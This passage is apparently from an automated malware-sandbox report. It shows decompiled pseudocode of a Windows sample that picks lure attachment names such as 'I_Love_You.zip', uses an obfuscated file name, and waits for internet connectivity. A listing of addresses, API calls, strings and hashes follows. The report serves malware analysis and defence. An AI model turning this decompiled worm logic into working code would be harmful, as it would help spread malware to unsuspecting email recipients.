                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xc:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1180 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1188 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0a4; // 0x40e688
                                                                          								_v1196 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__edx =  &_v76;
                                                                          								asm("cld");
                                                                          								__ecx = 0xa;
                                                                          								__eax = 0;
                                                                          								__edi = __edx;
                                                                          								__eax = memset(__edi, 0, 0xa << 2);
                                                                          								__edi = __edi + __ecx;
                                                                          								__ecx = 0;
                                                                          								_v1204 = "I_Love_You.zip";
                                                                          								_v1208 = __edx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xd:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1180 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1188 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0a8; // 0x40e6b2
                                                                          								_v1196 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__edx =  &_v76;
                                                                          								asm("cld");
                                                                          								__ecx = 0xa;
                                                                          								__eax = 0;
                                                                          								__edi = __edx;
                                                                          								__eax = memset(__edi, 0, 0xa << 2);
                                                                          								__edi = __edi + __ecx;
                                                                          								__ecx = 0;
                                                                          								_v1204 = "Happy_birthday_to_you.zip";
                                                                          								_v1208 = __edx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xe:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(2);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x16);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(4);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0xf:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0b4; // 0x40e785
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								if(E00404EAE(2) != 0) {
                                                                          									__eax = E00404EAE(0x16);
                                                                          									_v1188 = __eax;
                                                                          									__ebx =  &_v300;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__eax = E00404EAE(4);
                                                                          									_v1196 = __eax;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__edx =  &_v76;
                                                                          									asm("cld");
                                                                          									__ecx = 0xa;
                                                                          									__eax = 0;
                                                                          									__edi = __edx;
                                                                          									__eax = memset(__edi, 0, 0xa << 2);
                                                                          									__edi = __edi + __ecx;
                                                                          									__ecx = 0;
                                                                          									_v1204 = 0x40ede1;
                                                                          									_v1208 = __edx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          								} else {
                                                                          									__eax = E00404EAE(0x15);
                                                                          									_v1188 = __eax;
                                                                          									__ebx =  &_v300;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__eax = E00404EAE(4);
                                                                          									_v1196 = __eax;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__edx =  &_v76;
                                                                          									asm("cld");
                                                                          									__ecx = 0xa;
                                                                          									__eax = 0;
                                                                          									__edi = __edx;
                                                                          									__eax = memset(__edi, 0, 0xa << 2);
                                                                          									__edi = __edi + __ecx;
                                                                          									__ecx = 0;
                                                                          									_v1204 = 0x40ede1;
                                                                          									_v1208 = __edx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          								}
                                                                          								_v1212 = "mvcsvnd.qyy";
                                                                          								__ebx =  &_v812;
                                                                          								 *__esp = __ebx;
                                                                          								__eax = E00404C38();
                                                                          								_v1208 = __ebx;
                                                                          								_v1212 = 0x104;
                                                                          								__eax =  &_v780;
                                                                          								 *__esp =  &_v780;
                                                                          								__eax = E00404620();
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0x10:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0b8; // 0x40e7a0
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x16);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(4);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0x11:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0bc; // 0x40e7cc
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d148; // 0x40eb0c
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0x12:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0c0; // 0x40e7f1
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x16);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(4);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__edx =  &_v76;
                                                                          								asm("cld");
                                                                          								__ecx = 0xa;
                                                                          								__eax = 0;
                                                                          								__edi = __edx;
                                                                          								__eax = memset(__edi, 0, 0xa << 2);
                                                                          								__edi = __edi + __ecx;
                                                                          								__ecx = 0;
                                                                          								_v1204 = 0x40edf7;
                                                                          								_v1208 = __edx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								L31:
                                                                          								while(E00404F0A(_t354, _t360) == 0) {
                                                                          									 *_t374 = 0x7530;
                                                                          									Sleep(??);
                                                                          									_t374 = _t374 - 4;
                                                                          								}
                                                                          								_v1152 = _v1072;
                                                                          								_v1156 =  &_v76;
                                                                          								_v1160 =  &_v780;
                                                                          								_v1164 =  &_v508;
                                                                          								_v1168 =  &_v188;
                                                                          								_v1172 =  &_v1068;
                                                                          								 *_t374 =  &_v300;
                                                                          								E00405EE8();
                                                                          								_t358 = 0;
                                                                          								goto L33;
                                                                          						}
                                                                          					}
                                                                          					goto L31;
                                                                          				}
                                                                          				L33:
                                                                          				return _t358;
                                                                          			}











































                                                                          0x00402294
                                                                          0x0040229e
                                                                          0x004022a1
                                                                          0x004022a4
                                                                          0x004022a9
                                                                          0x004022ac
                                                                          0x004022b4
                                                                          0x004022ba
                                                                          0x004022d3
                                                                          0x004022d8
                                                                          0x004022dc
                                                                          0x004022df
                                                                          0x004022e4
                                                                          0x004022e7
                                                                          0x004022ef
                                                                          0x004022f5
                                                                          0x004022f8
                                                                          0x004022fd
                                                                          0x00402301
                                                                          0x0040230f
                                                                          0x00402312
                                                                          0x00402317
                                                                          0x00402323
                                                                          0x00402325
                                                                          0x00402331
                                                                          0x00402337
                                                                          0x0040233f
                                                                          0x00402346
                                                                          0x0040234b
                                                                          0x0040234e
                                                                          0x0040235a
                                                                          0x0040235a
                                                                          0x00402368
                                                                          0x00402370
                                                                          0x00402378
                                                                          0x0040237b
                                                                          0x00402386
                                                                          0x0040238e
                                                                          0x00402396
                                                                          0x00402399
                                                                          0x004023a4
                                                                          0x004023ac
                                                                          0x004023b4
                                                                          0x004023b7
                                                                          0x004023bc
                                                                          0x004023bf
                                                                          0x004023cc
                                                                          0x004023cc
                                                                          0x004023d6
                                                                          0x004023da
                                                                          0x004023dc
                                                                          0x004023df
                                                                          0x004023e7
                                                                          0x004023ef
                                                                          0x004023f2
                                                                          0x00402403
                                                                          0x00402407
                                                                          0x0040240a
                                                                          0x00402412
                                                                          0x0040241a
                                                                          0x0040241d
                                                                          0x00402422
                                                                          0x00402425
                                                                          0x00402431
                                                                          0x00402439
                                                                          0x00402441
                                                                          0x0040244b
                                                                          0x0040244d
                                                                          0x0040245b
                                                                          0x0040245b
                                                                          0x00402461
                                                                          0x00402467
                                                                          0x00000000
                                                                          0x00402475
                                                                          0x0040247f
                                                                          0x00402482
                                                                          0x00402487
                                                                          0x0040248a
                                                                          0x0040249d
                                                                          0x004024a7
                                                                          0x004024aa
                                                                          0x004024af
                                                                          0x004024b2
                                                                          0x004024c5
                                                                          0x004024cf
                                                                          0x004024d2
                                                                          0x004024d7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004024df
                                                                          0x004024e4
                                                                          0x004024e8
                                                                          0x004024ee
                                                                          0x004024f1
                                                                          0x004024f6
                                                                          0x004024f9
                                                                          0x00402500
                                                                          0x00402504
                                                                          0x0040250a
                                                                          0x0040250d
                                                                          0x00402512
                                                                          0x0040251c
                                                                          0x00402528
                                                                          0x0040252c
                                                                          0x00402532
                                                                          0x00402535
                                                                          0x0040253a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402542
                                                                          0x00402549
                                                                          0x0040254d
                                                                          0x00402553
                                                                          0x00402556
                                                                          0x0040255b
                                                                          0x00402565
                                                                          0x00402571
                                                                          0x00402575
                                                                          0x0040257b
                                                                          0x0040257e
                                                                          0x00402583
                                                                          0x00402586
                                                                          0x0040258b
                                                                          0x0040258f
                                                                          0x00402595
                                                                          0x00402598
                                                                          0x0040259d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004025a5
                                                                          0x004025ac
                                                                          0x004025b0
                                                                          0x004025b6
                                                                          0x004025b9
                                                                          0x004025be
                                                                          0x004025c8
                                                                          0x004025d4
                                                                          0x004025d8
                                                                          0x004025de
                                                                          0x004025e1
                                                                          0x004025e6
                                                                          0x004025e9
                                                                          0x004025ee
                                                                          0x004025f2
                                                                          0x004025f8
                                                                          0x004025fb
                                                                          0x00402600
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402608
                                                                          0x0040260f
                                                                          0x00402613
                                                                          0x00402619
                                                                          0x0040261c
                                                                          0x00402621
                                                                          0x0040262b
                                                                          0x00402637
                                                                          0x0040263b
                                                                          0x00402641
                                                                          0x00402644
                                                                          0x00402649
                                                                          0x0040264c
                                                                          0x00402651
                                                                          0x00402655
                                                                          0x0040265b
                                                                          0x0040265e
                                                                          0x00402663
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040266b
                                                                          0x00402672
                                                                          0x00402676
                                                                          0x0040267c
                                                                          0x0040267f
                                                                          0x00402684
                                                                          0x0040268e
                                                                          0x0040269a
                                                                          0x0040269e
                                                                          0x004026a4
                                                                          0x004026a7
                                                                          0x004026ac
                                                                          0x004026af
                                                                          0x004026b4
                                                                          0x004026b8
                                                                          0x004026be
                                                                          0x004026c1
                                                                          0x004026c6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004026ce
                                                                          0x004026d5
                                                                          0x004026d9
                                                                          0x004026df
                                                                          0x004026e2
                                                                          0x004026e7
                                                                          0x004026ea
                                                                          0x004026ef
                                                                          0x004026f3
                                                                          0x004026f9
                                                                          0x004026fc
                                                                          0x00402701
                                                                          0x0040270b
                                                                          0x00402717
                                                                          0x0040271b
                                                                          0x00402721
                                                                          0x00402724
                                                                          0x00402729
                                                                          0x00402733
                                                                          0x0040273f
                                                                          0x00402743
                                                                          0x00402746
                                                                          0x0040274b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402753
                                                                          0x0040275a
                                                                          0x0040275e
                                                                          0x00402764
                                                                          0x00402767
                                                                          0x0040276c
                                                                          0x0040276f
                                                                          0x00402774
                                                                          0x00402778
                                                                          0x0040277e
                                                                          0x00402781
                                                                          0x00402786
                                                                          0x00402790
                                                                          0x0040279c
                                                                          0x004027a0
                                                                          0x004027a6
                                                                          0x004027a9
                                                                          0x004027ae
                                                                          0x004027b8
                                                                          0x004027c4
                                                                          0x004027c8
                                                                          0x004027cb
                                                                          0x004027d0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004027d8
                                                                          0x004027df
                                                                          0x004027e3
                                                                          0x004027e9
                                                                          0x004027ec
                                                                          0x004027f1
                                                                          0x004027f4
                                                                          0x004027f9
                                                                          0x004027fd
                                                                          0x00402803
                                                                          0x00402806
                                                                          0x0040280b
                                                                          0x00402815
                                                                          0x00402821
                                                                          0x00402825
                                                                          0x0040282b
                                                                          0x0040282e
                                                                          0x00402833
                                                                          0x0040283d
                                                                          0x00402849
                                                                          0x0040284d
                                                                          0x00402850
                                                                          0x00402855
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040285d
                                                                          0x00402864
                                                                          0x00402868
                                                                          0x0040286e
                                                                          0x00402871
                                                                          0x00402876
                                                                          0x00402879
                                                                          0x0040287e
                                                                          0x00402882
                                                                          0x00402888
                                                                          0x0040288b
                                                                          0x00402890
                                                                          0x0040289a
                                                                          0x004028a6
                                                                          0x004028aa
                                                                          0x004028b0
                                                                          0x004028b3
                                                                          0x004028b8
                                                                          0x004028c2
                                                                          0x004028ce
                                                                          0x004028d2
                                                                          0x004028d5
                                                                          0x004028da
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004028e2
                                                                          0x004028e9
                                                                          0x004028ed
                                                                          0x004028f3
                                                                          0x004028f6
                                                                          0x004028fb
                                                                          0x004028fe
                                                                          0x00402903
                                                                          0x00402907
                                                                          0x0040290d
                                                                          0x00402910
                                                                          0x00402915
                                                                          0x00402918
                                                                          0x00402920
                                                                          0x00402926
                                                                          0x00402929
                                                                          0x0040292e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402936
                                                                          0x0040293d
                                                                          0x00402941
                                                                          0x00402947
                                                                          0x0040294a
                                                                          0x0040294f
                                                                          0x00402959
                                                                          0x00402965
                                                                          0x00402969
                                                                          0x0040296f
                                                                          0x00402972
                                                                          0x00402977
                                                                          0x00402981
                                                                          0x0040298d
                                                                          0x00402991
                                                                          0x00402997
                                                                          0x0040299a
                                                                          0x0040299f
                                                                          0x004029a9
                                                                          0x004029b5
                                                                          0x004029b9
                                                                          0x004029bc
                                                                          0x004029c1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004029c9
                                                                          0x004029d0
                                                                          0x004029d4
                                                                          0x004029da
                                                                          0x004029dd
                                                                          0x004029e2
                                                                          0x004029ec
                                                                          0x004029f8
                                                                          0x004029fc
                                                                          0x00402a02
                                                                          0x00402a05
                                                                          0x00402a0a
                                                                          0x00402a14
                                                                          0x00402a20
                                                                          0x00402a24
                                                                          0x00402a27
                                                                          0x00402a2c
                                                                          0x00402a2f
                                                                          0x00402a34
                                                                          0x00402a38
                                                                          0x00402a3e
                                                                          0x00402a41
                                                                          0x00402a46
                                                                          0x00402a49
                                                                          0x00402a4c
                                                                          0x00402a4d
                                                                          0x00402a52
                                                                          0x00402a57
                                                                          0x00402a59
                                                                          0x00402a59
                                                                          0x00402a59
                                                                          0x00402a5b
                                                                          0x00402a63
                                                                          0x00402a66
                                                                          0x00402a6b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402a73
                                                                          0x00402a7a
                                                                          0x00402a7e
                                                                          0x00402a84
                                                                          0x00402a87
                                                                          0x00402a8c
                                                                          0x00402a96
                                                                          0x00402aa2
                                                                          0x00402aa6
                                                                          0x00402aac
                                                                          0x00402aaf
                                                                          0x00402ab4
                                                                          0x00402abe
                                                                          0x00402aca
                                                                          0x00402ace
                                                                          0x00402ad1
                                                                          0x00402ad6
                                                                          0x00402ad9
                                                                          0x00402ade
                                                                          0x00402ae2
                                                                          0x00402ae8
                                                                          0x00402aeb
                                                                          0x00402af0
                                                                          0x00402af3
                                                                          0x00402af6
                                                                          0x00402af7
                                                                          0x00402afc
                                                                          0x00402b01
                                                                          0x00402b03
                                                                          0x00402b03
                                                                          0x00402b03
                                                                          0x00402b05
                                                                          0x00402b0d
                                                                          0x00402b10
                                                                          0x00402b15
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402b1d
                                                                          0x00402b24
                                                                          0x00402b28
                                                                          0x00402b2e
                                                                          0x00402b31
                                                                          0x00402b36
                                                                          0x00402b40
                                                                          0x00402b4c
                                                                          0x00402b50
                                                                          0x00402b56
                                                                          0x00402b59
                                                                          0x00402b5e
                                                                          0x00402b68
                                                                          0x00402b74
                                                                          0x00402b78
                                                                          0x00402b7e
                                                                          0x00402b81
                                                                          0x00402b86
                                                                          0x00402b90
                                                                          0x00402b9c
                                                                          0x00402ba0
                                                                          0x00402ba3
                                                                          0x00402ba8
                                                                          0x00402bab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402bba
                                                                          0x00402bc1
                                                                          0x00402bc5
                                                                          0x00402bcb
                                                                          0x00402bce
                                                                          0x00402bd3
                                                                          0x00402bd6
                                                                          0x00402bdb
                                                                          0x00402bdf
                                                                          0x00402be5
                                                                          0x00402be8
                                                                          0x00402bed
                                                                          0x00402bfe
                                                                          0x00402c78
                                                                          0x00402c84
                                                                          0x00402c88
                                                                          0x00402c8e
                                                                          0x00402c91
                                                                          0x00402c96
                                                                          0x00402ca0
                                                                          0x00402cac
                                                                          0x00402cb0
                                                                          0x00402cb3
                                                                          0x00402cb8
                                                                          0x00402cbb
                                                                          0x00402cbe
                                                                          0x00402cbf
                                                                          0x00402cc4
                                                                          0x00402cc9
                                                                          0x00402ccb
                                                                          0x00402ccb
                                                                          0x00402ccb
                                                                          0x00402ccd
                                                                          0x00402cd5
                                                                          0x00402cd8
                                                                          0x00402cdd
                                                                          0x00402c00
                                                                          0x00402c07
                                                                          0x00402c13
                                                                          0x00402c17
                                                                          0x00402c1d
                                                                          0x00402c20
                                                                          0x00402c25
                                                                          0x00402c2f
                                                                          0x00402c3b
                                                                          0x00402c3f
                                                                          0x00402c42
                                                                          0x00402c47
                                                                          0x00402c4a
                                                                          0x00402c4d
                                                                          0x00402c4e
                                                                          0x00402c53
                                                                          0x00402c58
                                                                          0x00402c5a
                                                                          0x00402c5a
                                                                          0x00402c5a
                                                                          0x00402c5c
                                                                          0x00402c64
                                                                          0x00402c67
                                                                          0x00402c6c
                                                                          0x00402c6c
                                                                          0x00402ce0
                                                                          0x00402ce8
                                                                          0x00402cee
                                                                          0x00402cf1
                                                                          0x00402cf6
                                                                          0x00402cfa
                                                                          0x00402d02
                                                                          0x00402d08
                                                                          0x00402d0b
                                                                          0x00402d10
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d1f
                                                                          0x00402d26
                                                                          0x00402d2a
                                                                          0x00402d30
                                                                          0x00402d33
                                                                          0x00402d38
                                                                          0x00402d3b
                                                                          0x00402d40
                                                                          0x00402d44
                                                                          0x00402d4a
                                                                          0x00402d4d
                                                                          0x00402d52
                                                                          0x00402d5c
                                                                          0x00402d68
                                                                          0x00402d6c
                                                                          0x00402d72
                                                                          0x00402d75
                                                                          0x00402d7a
                                                                          0x00402d84
                                                                          0x00402d90
                                                                          0x00402d94
                                                                          0x00402d97
                                                                          0x00402d9c
                                                                          0x00402d9f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402dae
                                                                          0x00402db5
                                                                          0x00402db9
                                                                          0x00402dbf
                                                                          0x00402dc2
                                                                          0x00402dc7
                                                                          0x00402dca
                                                                          0x00402dcf
                                                                          0x00402dd3
                                                                          0x00402dd9
                                                                          0x00402ddc
                                                                          0x00402de1
                                                                          0x00402de4
                                                                          0x00402de9
                                                                          0x00402ded
                                                                          0x00402df3
                                                                          0x00402df6
                                                                          0x00402dfb
                                                                          0x00402dfe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402e0d
                                                                          0x00402e14
                                                                          0x00402e18
                                                                          0x00402e1e
                                                                          0x00402e21
                                                                          0x00402e26
                                                                          0x00402e29
                                                                          0x00402e2e
                                                                          0x00402e32
                                                                          0x00402e38
                                                                          0x00402e3b
                                                                          0x00402e40
                                                                          0x00402e4a
                                                                          0x00402e56
                                                                          0x00402e5a
                                                                          0x00402e60
                                                                          0x00402e63
                                                                          0x00402e68
                                                                          0x00402e72
                                                                          0x00402e7e
                                                                          0x00402e82
                                                                          0x00402e85
                                                                          0x00402e8a
                                                                          0x00402e8d
                                                                          0x00402e90
                                                                          0x00402e91
                                                                          0x00402e96
                                                                          0x00402e9b
                                                                          0x00402e9d
                                                                          0x00402e9d
                                                                          0x00402e9d
                                                                          0x00402e9f
                                                                          0x00402ea7
                                                                          0x00402eaa
                                                                          0x00402eaf
                                                                          0x00402eb2
                                                                          0x00000000
                                                                          0x00402ecd
                                                                          0x00402ebe
                                                                          0x00402ec5
                                                                          0x00402eca
                                                                          0x00402eca
                                                                          0x00402edc
                                                                          0x00402ee3
                                                                          0x00402eed
                                                                          0x00402ef7
                                                                          0x00402f01
                                                                          0x00402f0b
                                                                          0x00402f15
                                                                          0x00402f18
                                                                          0x00402f1d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402467
                                                                          0x00000000
                                                                          0x00402461
                                                                          0x00402f22
                                                                          0x00402f2b

                                                                          APIs
                                                                          • lstrlen.KERNEL32 ref: 004022A4
                                                                          • memset.MSVCRT ref: 004022D3
                                                                          • lstrcpy.KERNEL32 ref: 004022DF
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • Sleep.KERNEL32 ref: 00402346
                                                                          • memset.MSVCRT ref: 0040237B
                                                                          • memset.MSVCRT ref: 00402399
                                                                          • memset.MSVCRT ref: 004023B7
                                                                          • lstrcat.KERNEL32 ref: 004023DF
                                                                          • lstrcat.KERNEL32 ref: 004023F2
                                                                          • lstrcat.KERNEL32 ref: 0040240A
                                                                          • lstrcat.KERNEL32 ref: 0040241D
                                                                          • strstr.MSVCRT ref: 00402444
                                                                          • lstrcat.KERNEL32 ref: 00402482
                                                                          • lstrcat.KERNEL32 ref: 004024AA
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 004024D2
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$memset$Sleeplstrlen$ConnectedCountDirectoryHandleInternetLibraryLoadModuleStateSystemTicklstrcpyrandsrandstrstr
                                                                          • String ID: .ru$.zip$8@$N@$X@$_@$d$mvcsv.qyy$s@$@
                                                                          • API String ID: 4149311011-1716888737
                                                                          • Opcode ID: 7e3f864fb77927ba2efb06760720045ebe60907d4ebc95661c7502bd9f0cadcb
                                                                          • Instruction ID: c4b552956d8c88359d0401bfea8a3880dfb39e4fafa2b11eb934faa6a3ed69b2
                                                                          • Opcode Fuzzy Hash: 7e3f864fb77927ba2efb06760720045ebe60907d4ebc95661c7502bd9f0cadcb
                                                                          • Instruction Fuzzy Hash: 27F1DBB5814304CBCB10BF75D98569DBBF0BB84304F41897EE9C8A7291EB389698CF56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
